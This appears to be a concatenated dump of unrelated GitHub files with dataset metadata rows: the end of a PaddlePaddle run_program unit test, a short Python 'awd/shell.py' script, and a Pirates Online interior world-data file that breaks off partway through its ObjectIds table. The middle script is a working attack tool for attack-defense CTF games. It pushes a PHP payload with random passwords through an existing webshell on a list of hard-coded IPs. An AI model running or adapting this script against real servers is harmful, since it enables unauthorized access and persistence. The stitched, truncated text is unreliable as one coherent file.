# grad_name = param.name + core.grad_var_suffix()
# grad_var = train_program.desc.block(0).find_var(
# cpt.to_bytes(grad_name))
# # NOTE: cannot find var desc maybe no problem, such as in batch_norm
# if grad_var is None:
# continue
# param._set_grad_type(grad_var.type())
def _create_out(var):
assert isinstance(var, Variable)
var_desc = var.desc
varbase = None
if _in_legacy_dygraph():
var_base = core.VarBase(var_desc.dtype(), var_desc.shape(),
var_desc.name(), var_desc.type(), False)
else:
var_base = core.eager.Tensor(var_desc.dtype(), var_desc.shape(),
var_desc.name(), var_desc.type(), False)
return var_base
class TestRunProgram(unittest.TestCase):
def test_eager(self):
paddle.set_device('cpu')
paddle.enable_static()
# step 1: construct program
x = paddle.static.data(shape=[2, 4], name='x')
x.stop_gradient = False
y = paddle.static.data(shape=[4, 2], name='y')
y.stop_gradient = False
out = paddle.matmul(x, y)
main_program = paddle.static.default_main_program()
program = _append_backward_desc(main_program, [out])
paddle.disable_static('cpu')
# step 2: call run_program in eager mode
with _test_eager_guard():
x_t = paddle.ones([2, 4])
x_t.name = "x"
x_t.stop_gradient = False
y_t = paddle.ones([4, 2])
y_t.name = "y"
y_t.stop_gradient = False
fake_var = paddle.zeros([1])
fake_var.name = 'Fake_var'
out_t = _create_out(out)
scope = core.Scope()
attrs = ('global_block', program.desc.block(0), 'start_op_index', 0,
'end_op_index', main_program.desc.block(0).op_size(),
'is_test', False, 'program_id', _hash_with_id(program))
_C_ops.run_program([x_t, y_t], [fake_var], [out_t], [scope],
[fake_var], None, *attrs)
loss = paddle.mean(out_t)
loss.backward()
np.testing.assert_array_equal(np.ones([2, 2]) * 4, out_t.numpy())
np.testing.assert_array_equal(
np.ones([2, 4]) * 0.5, x_t.grad.numpy())
np.testing.assert_array_equal(
np.ones([4, 2]) * 0.5, y_t.grad.numpy())
if __name__ == '__main__':
unittest.main()
| [
"noreply@github.com"
] | jiangjiajun.noreply@github.com |
bd7f8f43434bce3c16ea97db4e907dd0e2835440 | 0cc8dd3549d12e24fb4ceb007001676a4dc27130 | /awd/shell.py | b103d3dce3c86c0c33f1f195501d91b5786e3a19 | [] | no_license | virink/vFuckingTools | 78c98a2093deac438e173e0ef2d72cc8453f33bd | 71cafcf60b347d09ff5c62fb9d7a27daea85b5e2 | refs/heads/master | 2021-01-22T18:29:00.926553 | 2019-05-05T05:51:38 | 2019-05-05T05:51:38 | 85,087,381 | 14 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,357 | py | #!/usr/bin/env python
import requests
import random
ip_pass = {}
shell_pass = []
shell_address = '/WordPress/shell.php'
ips = ['40.10.10.57',
'40.10.10.26',
'40.10.10.11',
'40.10.10.62',
'40.10.10.24',
'40.10.10.59',
'40.10.10.47',
'40.10.10.42',
'40.10.10.15',
]
def get_shell(file):
return open(file).read()
def random_str(randomlength=6):
str = ''
chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
length = len(chars) - 1
for i in range(randomlength):
str += chars[random.randint(0, length)]
return str
def fuck(ip, password):
global filepath
# payload = % password
payload = get_shell('s4.php')
payload = payload.replace('passwordpassword', password).replace(
'<?php', '').replace('?>', '').replace('filepathfilepath', filepath)
try:
ip_pass[ip] = password
data = {'1': payload}
r = requests.post('http://' + ip + shell_address, data=data, timeout=3)
if r.status_code == '200':
print(ip + 'shell exist')
ip_pass[ip] = password
except requests.exceptions.ReadTimeout, e:
print('except : ' + e)
pass
if __name__ == '__main__':
filepath = ''
for ip in ips:
password = random_str()
fuck(ip, password)
| [
"virink@outlook.com"
] | virink@outlook.com |
3d10909823fee7ad8aaaea67770d346387aefd7b | ebd5c4632bb5f85c9e3311fd70f6f1bf92fae53f | /Sourcem8/pirates/leveleditor/worldData/interior_shanty_npc_house.py | 6876fa8755c7e22fe3463a653ba427fbe5d6d7e2 | [] | no_license | BrandonAlex/Pirates-Online-Retribution | 7f881a64ec74e595aaf62e78a39375d2d51f4d2e | 980b7448f798e255eecfb6bd2ebb67b299b27dd7 | refs/heads/master | 2020-04-02T14:22:28.626453 | 2018-10-24T15:33:17 | 2018-10-24T15:33:17 | 154,521,816 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 38,302 | py | from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {
'Objects': {
'1156371286.47luzd0': {
'Type': 'Building Interior',
'Name': '',
'Instanced': True,
'Objects': {
'1165344228.45kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(8.1099999999999994, -10.045999999999999, 0.0),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.79000002145767212, 0.64999997615814209, 0.52999997138977051, 1.0),
'Model': 'models/props/table_shanty_2' } },
'1165344265.72kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Holiday': '',
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(4.343, -12.161, 0.13300000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'VisSize': '',
'Visual': {
'Color': (0.75999999046325684, 0.75999999046325684, 0.69999998807907104, 1.0),
'Model': 'models/props/chair_shanty' } },
'1165344324.52kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': VBase3(40.780999999999999, 3.056, -3.7599999999999998),
'Pos': Point3(4.7990000000000004, -8.9290000000000003, 0.014999999999999999),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.75999999046325684, 0.75999999046325684, 0.69999998807907104, 1.0),
'Model': 'models/props/chair_shanty' } },
'1165344340.36kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': VBase3(-171.66499999999999, 0.0, 0.0),
'Pos': Point3(7.8890000000000002, -14.423999999999999, 0.0),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/chair_shanty' } },
'1165344362.31kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': VBase3(142.25399999999999, 0.0, 0.0),
'Pos': Point3(11.702, -11.606, 0.0),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.75999999046325684, 0.62999999523162842, 0.47999998927116394, 1.0),
'Model': 'models/props/chair_shanty' } },
'1165344408.19kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': VBase3(0.0, 0.0, 0.0),
'Pos': Point3(8.3450000000000006, -7.4269999999999996, 2.9740000000000002),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/jar' } },
'1165344472.14kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(8.4619999999999997, -9.766, 3.0430000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/waterpitcher' } },
'1165344556.34kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': VBase3(0.0, 0.0, 0.0),
'Pos': Point3(8.1240000000000006, -3.5859999999999999, 0.0),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.80000001192092896, 0.68999999761581421, 0.62000000476837158, 1.0),
'Model': 'models/props/bench_shanty_1' } },
'1165344597.42kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': VBase3(39.389000000000003, 0.0, 0.0),
'Objects': { },
'Pos': Point3(-14.800000000000001, -10.885, 0.0),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.43000000715255737, 0.34999999403953552, 0.40999999642372131, 1.0),
'Model': 'models/props/bench_shanty_2' } },
'1165344630.91kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': VBase3(98.614000000000004, 0.0, 0.0),
'Pos': Point3(-12.010999999999999, -3.5910000000000002, -0.0089999999999999993),
'Scale': VBase3(1.3029999999999999, 1.3029999999999999, 1.3029999999999999),
'Visual': {
'Model': 'models/props/winebottle_A' } },
'1165344741.81kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': VBase3(119.068, -1.2509999999999999, 0.69499999999999995),
'Pos': Point3(-12.523, -2.355, -0.050000000000000003),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.79000000000000004, 0.78000000000000003, 0.69999999999999996, 1.0),
'Model': 'models/props/stool_shanty' } },
'1165344792.45kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': VBase3(-102.797, 0.0, 0.0),
'Pos': Point3(-17.474, 0.89700000000000002, 0.095000000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/bench_shanty_2' } },
'1165344875.45kmuller': {
'Type': 'Barrel',
'DisableCollision': False,
'Hpr': VBase3(-88.078000000000003, 0.0, 0.0),
'Pos': Point3(-16.710000000000001, -23.417999999999999, -0.27500000000000002),
'Scale': VBase3(0.74399999999999999, 0.74399999999999999, 0.74399999999999999),
'Visual': {
'Model': 'models/props/barrel_group_1' } },
'1165344934.56kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': VBase3(39.389000000000003, 0.0, 0.0),
'Pos': Point3(-16.209, -11.875999999999999, 1.6100000000000001),
'Scale': VBase3(0.56899999999999995, 0.56899999999999995, 0.56899999999999995),
'Visual': {
'Model': 'models/props/pitcher_brown' } },
'1165345171.86kmuller': {
'Type': 'Crate',
'DisableCollision': True,
'Hpr': VBase3(-28.428000000000001, 0.0, 0.0),
'Pos': Point3(3.3919999999999999, 26.099, 0.078),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.69999998807907104, 0.73000001907348633, 0.57999998331069946, 1.0),
'Model': 'models/props/crates_group_2' } },
'1165345203.69kmuller': {
'Type': 'Crate',
'DisableCollision': False,
'Hpr': VBase3(0.0, 0.0, 0.0),
'Pos': Point3(-2.343, 25.657, -0.032000000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/crate' } },
'1165345305.27kmuller': {
'Type': 'Crate',
'DisableCollision': False,
'Hpr': VBase3(0.0, 0.0, 0.0),
'Pos': Point3(-10.954000000000001, 27.113, 0.123),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/crates_group_2' } },
'1165345386.11kmuller': {
'Type': 'Barrel',
'DisableCollision': True,
'Hpr': VBase3(0.0, 0.76300000000000001, 0.0),
'Pos': Point3(-18.094999999999999, 26.719000000000001, -0.041000000000000002),
'Scale': VBase3(0.76700000000000002, 0.76700000000000002, 0.76700000000000002),
'Visual': {
'Color': (0.6600000262260437, 0.54000002145767212, 0.4699999988079071, 1.0),
'Model': 'models/props/barrel_worn' } },
'1166055721.46kmuller': {
'Type': 'Prop_Groups',
'DisableCollision': False,
'Hpr': VBase3(179.94, 0.0, 0.0),
'Pos': Point3(12.173, 23.709, 0.080000000000000002),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.57999998331069946, 0.51999998092651367, 0.54000002145767212, 1.0),
'Model': 'models/props/prop_group_G' } },
'1166055838.34kmuller': {
'Type': 'Wall_Hangings',
'DisableCollision': False,
'Hpr': VBase3(-88.317999999999998, 0.0, 0.0),
'Pos': Point3(19.738, -8.9480000000000004, 8.0190000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/Map_01_unframed' } },
'1166056045.98kmuller': {
'Type': 'Light_Fixtures',
'DisableCollision': False,
'Hpr': VBase3(0.0, 0.0, 0.0),
'Pos': Point3(-1.7909999999999999, 25.504999999999999, 2.7320000000000002),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/lamp_table_hurricane_oil' } },
'1167156249.03kmuller': {
'Type': 'Furniture',
'DisableCollision': True,
'Hpr': VBase3(-1.4139999999999999, 0.0, 0.0),
'Pos': Point3(-15.593999999999999, 8.4909999999999997, 0.002),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.80000000000000004, 0.79000000000000004, 0.83999999999999997, 1.0),
'Model': 'models/props/bookshelf_shanty' } },
'1167156430.64kmuller': {
'Type': 'Furniture',
'DisableCollision': True,
'Hpr': VBase3(-1.4139999999999999, 0.0, 0.0),
'Pos': Point3(-7.3940000000000001, 7.9900000000000002, -3.6160000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.80000000000000004, 0.93000000000000005, 0.83999999999999997, 1.0),
'Model': 'models/props/bookshelf_shanty' } },
'1167156651.85kmuller': {
'Type': 'Bucket',
'DisableCollision': True,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(-9.6300000000000008, 8.1440000000000001, 4.1189999999999998),
'Scale': VBase3(0.55500000000000005, 0.55500000000000005, 0.55500000000000005),
'Visual': {
'Model': 'models/props/bucket_handles' } },
'1167156680.76kmuller': {
'Type': 'Pan',
'DisableCollision': False,
'Hpr': VBase3(-37.421999999999997, 0.0, 0.0),
'Pos': Point3(-4.5579999999999998, 7.5030000000000001, 2.4100000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/pan' } },
'1167156728.14kmuller': {
'Type': 'Pots',
'DisableCollision': False,
'Hpr': VBase3(84.783000000000001, -0.23899999999999999, 2.6160000000000001),
'Pos': Point3(-6.4219999999999997, 7.1550000000000002, 0.51500000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/pot_A' } },
'1167175789.09kmuller': {
'Type': 'Prop_Groups',
'DisableCollision': True,
'Hpr': VBase3(-110.209, 0.0, 0.0),
'Pos': Point3(-17.024000000000001, 21.042999999999999, 0.0),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/prop_group01' } },
'1167175832.07kmuller': {
'Type': 'Prop_Groups',
'DisableCollision': False,
'Holiday': '',
'Hpr': VBase3(11.423999999999999, 0.0, 0.0),
'Pos': Point3(15.657, -24.34, 0.0),
'Scale': VBase3(1.0, 1.0, 1.0),
'VisSize': '',
'Visual': {
'Model': 'models/props/prop_group03' } },
'1167770798.99kmuller': {
'Type': 'Interior_furnishings',
'DisableCollision': True,
'Hpr': VBase3(90.596999999999994, 0.0, 0.0),
'Pos': Point3(-18.004999999999999, -7.1600000000000001, 0.0),
'Scale': VBase3(1.208, 1.208, 1.208),
'Visual': {
'Model': 'models/props/stove_potbelly' } },
'1167770993.8kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': VBase3(-19.701000000000001, 51.665999999999997, -47.698),
'Pos': Point3(12.074999999999999, 19.867000000000001, 4.0519999999999996),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/bottle_brown' } },
'1167969614.23kmuller': {
'Type': 'Pan',
'DisableCollision': False,
'Hpr': VBase3(42.484000000000002, 0.0, 0.0),
'Pos': Point3(-17.777000000000001, -7.2249999999999996, 4.0910000000000002),
'Scale': VBase3(1.2150000000000001, 1.2150000000000001, 1.2150000000000001),
'Visual': {
'Model': 'models/props/pan' } },
'1167969727.94kmuller': {
'Type': 'Light_Fixtures',
'DisableCollision': False,
'Hpr': VBase3(-33.240000000000002, 0.0, 0.0),
'Pos': Point3(8.5879999999999992, -11.577999999999999, 2.9980000000000002),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/candle_holder' } },
'1167969766.85kmuller': {
'Type': 'Bucket',
'DisableCollision': True,
'Hpr': VBase3(40.520000000000003, 0.0, 0.0),
'Pos': Point3(-7.7670000000000003, 8.0640000000000001, 0.5),
'Scale': VBase3(0.61299999999999999, 0.61299999999999999, 0.61299999999999999),
'Visual': {
'Model': 'models/props/washtub' } },
'1167969844.67kmuller': {
'Type': 'Baskets',
'DisableCollision': True,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(-14.246, 8.3949999999999996, 2.8090000000000002),
'Scale': VBase3(0.65500000000000003, 0.65500000000000003, 0.65500000000000003),
'Visual': {
'Color': (0.49000000953674316, 0.47999998927116394, 0.40000000596046448, 1.0),
'Model': 'models/props/basket_rope' } },
'1167969891.2kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(-16.702999999999999, 8.2680000000000007, 4.0750000000000002),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/winebottle_B' } },
'1167969900.36kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': VBase3(-70.304000000000002, 0.0, 0.0),
'Pos': Point3(-17.273, 7.7249999999999996, 4.0860000000000003),
'Scale': VBase3(1.1819999999999999, 1.1819999999999999, 1.1819999999999999),
'Visual': {
'Color': (0.69999998807907104, 0.69999998807907104, 0.69999998807907104, 1.0),
'Model': 'models/props/winebottle_B' } },
'1167969936.27kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(-13.481999999999999, 8.4640000000000004, 6.0469999999999997),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/waterpitcher' } },
'1167969971.92kmuller': {
'Type': 'Sack',
'DisableCollision': True,
'Hpr': VBase3(0.0, 0.0, -5.008),
'Pos': Point3(-4.3079999999999998, 7.3250000000000002, 4.226),
'Scale': VBase3(0.40600000000000003, 0.40600000000000003, 0.40600000000000003),
'Visual': {
'Color': (0.80000001192092896, 0.79000002145767212, 0.82999998331069946, 1.0),
'Model': 'models/props/Sack' } },
'1174672543.93dzlu': {
'Type': 'Light - Dynamic',
'Attenuation': '0.005',
'ConeAngle': '83.4091',
'DropOff': '2.7273',
'FlickRate': 0.5,
'Flickering': True,
'Hpr': VBase3(-7.9450000000000003, -56.476999999999997, -1.736),
'Intensity': '1.0909',
'LightType': 'SPOT',
'Pos': Point3(-2.3029999999999999, -27.916, 22.664000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.80000001192092896, 0.87450981140136719, 1.0, 1.0),
'Model': 'models/props/light_tool_bulb' } },
'1174672701.77dzlu': {
'Type': 'Light - Dynamic',
'Attenuation': '0.005',
'ConeAngle': '60.0000',
'DropOff': '0.0000',
'FlickRate': 0.5,
'Flickering': True,
'Hpr': VBase3(0.0, 0.0, 0.0),
'Intensity': '0.3333',
'LightType': 'AMBIENT',
'Pos': Point3(0.39800000000000002, 2.3340000000000001, 8.8859999999999992),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.8399999737739563, 0.69999998807907104, 1.0, 1.0),
'Model': 'models/props/light_tool_bulb' } },
'1176338996.15dzlu': {
'Type': 'Light - Dynamic',
'Attenuation': '0.005',
'ConeAngle': '60.0000',
'DropOff': '31.3636',
'FlickRate': 0.5,
'Flickering': False,
'Hpr': VBase3(92.483000000000004, -35.319000000000003, -33.607999999999997),
'Intensity': '1.1818',
'LightType': 'SPOT',
'Pos': Point3(19.262, 10.798, 11.169),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.87000000476837158, 1.0, 1.0, 1.0),
'Model': 'models/props/light_tool_bulb' } },
'1176339347.32dzlu': {
'Type': 'Light - Dynamic',
'Attenuation': '0.005',
'ConeAngle': '83.4091',
'DropOff': '16.3636',
'FlickRate': 0.5,
'Flickering': True,
'Hpr': VBase3(-179.58199999999999, -53.234999999999999, -173.87799999999999),
'Intensity': '0.7273',
'LightType': 'SPOT',
'Pos': Point3(-7.6029999999999998, 31.085999999999999, 18.887),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.80000001192092896, 0.87450981140136719, 1.0, 1.0),
'Model': 'models/props/light_tool_bulb' } },
'1185393793.62kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': VBase3(62.180999999999997, 0.0, 0.0),
'Pos': Point3(-11.994999999999999, 22.491, -0.98999999999999999),
'Scale': VBase3(1.841, 1.841, 1.841),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane' } },
'1185393885.79kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': VBase3(-108.55200000000001, 0.0, 0.0),
'Pos': Point3(1.8320000000000001, 29.898, 0.0),
'Scale': VBase3(0.81499999999999995, 1.0, 1.9670000000000001),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane' } },
'1185393954.26kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': VBase3(-41.901000000000003, 0.0, 0.0),
'Pos': Point3(2.3290000000000002, 24.433, -0.021999999999999999),
'Scale': VBase3(0.48699999999999999, 1.0, 1.925),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane' } },
'1185394014.06kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(20.408999999999999, 16.792000000000002, -0.66400000000000003),
'Scale': VBase3(0.625, 1.0, 1.7230000000000001),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane' } },
'1185394041.0kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': VBase3(-107.83, 0.0, 0.0),
'Pos': Point3(11.029999999999999, -29.952999999999999, -0.96499999999999997),
'Scale': VBase3(0.32900000000000001, 1.0, 1.401),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane' } },
'1185394121.67kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': VBase3(91.0, 0.0, 0.0),
'Pos': Point3(-13.568, -29.367000000000001, -0.27800000000000002),
'Scale': VBase3(0.251, 1.0, 1.623),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane' } },
'1185396291.79kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(-11.884, 7.9909999999999997, -0.312),
'Scale': VBase3(3.5219999999999998, 0.56599999999999995, 1.673),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_cube' } },
'1185396373.0kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(-18.986000000000001, -7.1040000000000001, -0.41299999999999998),
'Scale': VBase3(1.0, 0.54500000000000004, 2.004),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_cube' } },
'1205366897.45kmuller': {
'Type': 'Door Locator Node',
'Name': 'door_locator',
'Hpr': VBase3(0.0, 0.0, 0.0),
'Pos': Point3(0.047, -29.861000000000001, 0.067000000000000004),
'Scale': VBase3(1.0, 1.0, 1.0) },
'1205366965.03kmuller': {
'Type': 'Collision Barrier',
'DisableCollision': False,
'Hpr': VBase3(4.3879999999999999, 0.0, 0.0),
'Pos': Point3(-18.806999999999999, 14.321, -1.6910000000000001),
'Scale': VBase3(0.53200000000000003, 1.0, 1.986),
'Visual': {
'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane' } },
'1228170354.34kmuller': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(39.548000000000002, 0.0, 0.0),
'Pos': Point3(6.8310000000000004, -12.913, 2.9590000000000001),
'Scale': VBase3(1.5600000000000001, 1.5600000000000001, 1.5600000000000001),
'VisSize': '',
'Visual': {
'Model': 'models/props/pir_m_prp_hol_decoGift02_winter08' } },
'1228170436.83kmuller': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(39.548000000000002, 0.0, 0.0),
'Pos': Point3(7.0279999999999996, -8.2780000000000005, 2.9769999999999999),
'Scale': VBase3(0.96399999999999997, 0.96399999999999997, 0.96399999999999997),
'VisSize': '',
'Visual': {
'Color': (0.60000002384185791, 0.80000001192092896, 1.0, 1.0),
'Model': 'models/props/pir_m_prp_hol_decoGift03_winter08' } },
'1228170440.53kmuller': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(-6.5620000000000003, 0.0, 0.0),
'Pos': Point3(6.6909999999999998, -9.6229999999999993, 2.9990000000000001),
'Scale': VBase3(1.2709999999999999, 1.0109999999999999, 1.0109999999999999),
'VisSize': '',
'Visual': {
'Color': (0.80000001192092896, 0.60000002384185791, 1.0, 1.0),
'Model': 'models/props/pir_m_prp_hol_decoGift02_winter08' } },
'1257364092.45caoconno': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(178.923, 0.0, 0.0),
'Pos': Point3(-6.2439999999999998, -28.042999999999999, 7.9669999999999996),
'Scale': VBase3(1.0, 1.0, 1.0),
'VisSize': '',
'Visual': {
'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08' } },
'1257364187.71caoconno': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(178.923, 0.0, 0.0),
'Pos': Point3(6.9470000000000001, -28.128, 7.9669999999999996),
'Scale': VBase3(1.0, 1.0, 1.0),
'VisSize': '',
'Visual': {
'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08' } },
'1257796324.14caoconno': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(-180.0, 0.51400000000000001, 51.784999999999997),
'Pos': Point3(-7.5899999999999999, -28.423999999999999, 8.8989999999999991),
'Scale': VBase3(1.873, 1.873, 1.873),
'VisSize': '',
'Visual': {
'Model': 'models/props/pir_m_prp_hol_candycane_winter09' } },
'1257796371.34caoconno': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(0.0, -0.0, 51.060000000000002),
'Pos': Point3(-4.7839999999999998, -28.463999999999999, 8.9420000000000002),
'Scale': VBase3(1.873, 1.873, 1.873),
'VisSize': '',
'Visual': {
'Model': 'models/props/pir_m_prp_hol_candycane_winter09' } },
'1257796421.79caoconno': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(0.0, -0.0, 51.060000000000002),
'Pos': Point3(8.3450000000000006, -28.542000000000002, 8.5299999999999994),
'Scale': VBase3(1.7929999999999999, 1.7929999999999999, 1.7929999999999999),
'VisSize': '',
'Visual': {
'Model': 'models/props/pir_m_prp_hol_candycane_winter09' } },
'1257796421.81caoconno': {
'Type': 'Holiday',
'DisableCollision': False,
'Holiday': 'WinterFestival',
'Hpr': VBase3(-180.0, 0.51400000000000001, 51.784999999999997),
'Pos': Point3(5.6589999999999998, -28.504000000000001, 8.4890000000000008),
'Scale': VBase3(1.7929999999999999, 1.7929999999999999, 1.7929999999999999),
'VisSize': '',
'Visual': {
'Model': 'models/props/pir_m_prp_hol_candycane_winter09' } } },
'Visual': {
'Model': 'models/buildings/interior_shanty_npc_house' } } },
'Node Links': [],
'Layers': { },
'ObjectIds': {
'1156371286.47luzd0': '["Objects"]["1156371286.47luzd0"]',
'1165344228.45kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344228.45kmuller"]',
'1165344265.72kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344265.72kmuller"]',
'1165344324.52kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344324.52kmuller"]',
'1165344340.36kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344340.36kmuller"]',
'1165344362.31kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344362.31kmuller"]',
'1165344408.19kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344408.19kmuller"]',
'1165344472.14kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344472.14kmuller"]',
'1165344556.34kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344556.34kmuller"]',
'1165344597.42kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344597.42kmuller"]',
'1165344630.91kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344630.91kmuller"]',
'1165344741.81kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344741.81kmuller"]',
'1165344792.45kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344792.45kmuller"]',
'1165344875.45kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344875.45kmuller"]',
'1165344934.56kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165344934.56kmuller"]',
'1165345171.86kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165345171.86kmuller"]',
'1165345203.69kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165345203.69kmuller"]',
'1165345305.27kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165345305.27kmuller"]',
'1165345386.11kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1165345386.11kmuller"]',
'1166055721.46kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1166055721.46kmuller"]',
'1166055838.34kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1166055838.34kmuller"]',
'1166056045.98kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1166056045.98kmuller"]',
'1167156249.03kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167156249.03kmuller"]',
'1167156430.64kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167156430.64kmuller"]',
'1167156651.85kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167156651.85kmuller"]',
'1167156680.76kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167156680.76kmuller"]',
